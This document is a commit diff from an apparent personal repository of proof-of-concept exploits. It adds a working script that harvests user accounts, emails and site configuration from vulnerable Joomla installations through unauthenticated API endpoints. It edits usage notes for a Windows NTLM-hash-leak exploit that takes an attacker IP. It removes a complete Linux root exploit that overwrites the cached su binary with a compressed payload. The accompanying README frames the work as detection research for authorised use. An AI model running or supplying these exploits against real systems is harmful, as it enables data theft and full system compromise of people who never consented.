Fix 24071 README

Adding CVE-2025-24071 and tweaking READMEs

CVE-2023-23752.py

@@ -0,0 +1,76 @@
+import requests
+import json
+import argparse
+
+class User:
+    def __init__(user, name, email, lastvisitDate, groupNames):
+        user.name = name
+        user.email = email
+        user.lastvisitDate = lastvisitDate
+        user.groupNames = groupNames
+    
+    def __str__(user):
+        return f"Username: {user.name}\nEmail: {user.email}\nLast Visit: {user.lastvisitDate}\nGroups: {user.groupNames}"
+
+def vulnCheck(tgt):
+    verUrl = tgt + "/administrator/manifests/files/joomla.xml"
+    verData = requests.get(verUrl)
+    if len(verData.text) == 0 or "404" in verData.text.lower() or "403" in verData.text.lower():
+        print("[-] Site does not appear to be vulnerable!")
+        raise SystemExit
+
+def getUsers(tgt):
+    usrUrl = tgt + "/api/index.php/v1/users?public=true"
+    usrData = requests.get(usrUrl)
+    if "404" in usrData.text.lower() or "403" in usrData.text.lower():
+        print("[-] Error fetching user data, site may not be vulnerable")
+        raise SystemExit
+    parsedUsrs = json.loads(usrData.text)
+    return parsedUsrs
+
+def parseUsers(usrData):
+    users = []
+    for user in usrData["data"]:
+        userAtribs = user["attributes"]
+        newUser = User(userAtribs["username"],
+                       userAtribs["email"],
+                       userAtribs["lastvisitDate"],
+                       userAtribs["group_names"] )
+        users.append(newUser)
+    return users
+
+def getConfig(tgt):
+    cfgUrl = tgt + "/api/index.php/v1/config/application?public=true"
+    cfgData = requests.get(cfgUrl)
+    if "404" in cfgData.text.lower() or "403" in cfgData.text.lower():
+        print("[-] Error fetching user data, site may not be vulnerable")
+        raise SystemExit
+    parsedCfg = json.loads(cfgData.text)
+    return parsedCfg
+
+    
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(prog='Joomla Info Disclosure CVE-2023-23752', description='This is a PoC for CVE-2023-23752, an information disclosure vulnerability in Joomla < 4.2.8', epilog='Written by 0xVoodo')
+    parser.add_argument('-t', '--target', required=True, help='Target IP/URL')
+    args = parser.parse_args()
+
+    tgt = args.target.lower()
+
+    if tgt[4] != "http" and tgt[5] != "https":
+        print("[*] No URL schema specified, defaulting to HTTP")
+        tgt = "http://" + tgt
+
+    vulnCheck(tgt)
+
+    print(f"\n[+] User data found!") 
+    print("----------")
+    for user in parseUsers(getUsers(tgt)):
+        print(user)
+        print("----------")
+    
+    print(f"\n[+] Config data found!")
+    print("----------")
+    for i in getConfig(tgt)["data"]:
+        print(i["attributes"])
+

CVE-2025-24071/README.md

@@ -10,7 +10,7 @@ User interaction is required as the archive file must be opened for the connecti
 # Usage
 
 CVE-2025-2401.py -s <attacker IP/domain> -f <output file name>
-\-l <library name>  Renames the library file (default mal.library-ms)
+-l <library name>  Renames the library file (default mal.library-ms)
 
 # License
 GPL v3.0 - as all good software should be

CVE-2026-31431/CVE-2026-31431.py

@@ -1,38 +0,0 @@
-import os, zlib, socket
- 
- 
-def exploit(payload, su_file, counter):
- 
-    listener = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET)
-    listener.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
- 
-    listener.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, bytes.fromhex('0800010000000010'+'0'*64))
-    listener.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE, None, 4)
- 
-    connection, _ = listener.accept()
- 
-    connection.sendmsg([b"A"*4+payload], [(socket.SOL_ALG, 3, b'\x00'*4), (socket.SOL_ALG, 2, b'\x10'+b'\x00'*19), (socket.SOL_ALG, 4, b'\x08' + b'\x00' * 3),], 32768)
- 
-    stdin, stdout = os.pipe()
- 
-    os.splice(su_file, stdout, counter + 4, offset_src=0)
-    os.splice(stdin, connection.fileno(), counter + 4)
- 
-    try:
-        connection.recv(8 + counter)
-    except:
-        0
- 
-if __name__ == "__main__":
- 
-    payload = zlib.decompress(bytes.fromhex("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
- 
-    su_file = os.open("/usr/bin/su", 0)
- 
-    i = 0
- 
-    while i < len(payload):
-        exploit(payload[i:i+4], su_file, i)
-        i += 4
- 
-    os.system("su")

CVE-2026-31431/README.md

@@ -1,20 +0,0 @@
-# CopyFail | CVE-2026-31431 - Linux Privilege Escalation via Authencesn Scratch-Write Bug
-
-Full writeup @ [my blog](https://0xvoodoo.sh/articles/copyfail/) | OG Writeup [here](https://xint.io/blog/copy-fail-linux-distributions#the-root-cause-page-cache-pages-in-the-writable-scatterlist-1)
-
-This exploit has caused quite the panic among defenders, so I re-wrote/unminified [the original PoC](https://github.com/theori-io/copy-fail-CVE-2026-31431) to more easily look at detection opportunities. 
-
-In short, this exploit abuses the way `splice()` works and the AF_ALG socket type within [authencesn.c](https://github.com/torvalds/linux/blob/26fd6bff2c050196005312d1d306889220952a99/crypto/authencesn.c#L3) from the Linux crypto libraries. More or less, it allows the attacker to write 4 bytes of memory at a time to pagefiles, leading to the overwrite of the in-cache version of open files. When this is done with a SUID binary, like `/bin/su` the attacker is able to then execute the binary, which will pulls from the cache. This leaves the legit version of the overwritten binary in place while allowing arbitrary non-privileged users to gain root perms.
-
-*Note* - This exploit needs at least Python 3.10
-
-*Additional Note* - For sake of readibility, I've replaced the direct int descriptors with their named socket.* versions, this may slightly reduce portability.
-
-# License
-
-GPL v3.0 - as all good software should be
-
-Only use with explicit permission from the target system owner.
-
-Remember - don't be a skid :)
-

README.md

@@ -6,8 +6,6 @@ This repo contains proof of concept exploits for vulnerabilities I've come acros
 # Exploits
 - [CVE-2023-23752](https://github.com/0xVoodoo/PoCs/tree/main/CVE-2023-23752) - Information disclosure in Joomla CMS.
 - [CVE-2025-24893](https://github.com/0xVoodoo/PoCs/tree/main/CVE-2025-24893) - RCE in XWiki.
-- [CVE-2025-24071](https://github.com/0xVoodoo/PoCs/tree/main/CVE-2025-24071) - Windows Explorer NTLM Hash Disclosure
-- [CVE-2026-31431](https://github.com/0xVoodoo/PoCs/tree/main/CVE-2026-31431) - Linux LPE via Authencesn Scratch-Write Bug
 
 # License
 GPLv3 as all good software (or exploits I guess) should be.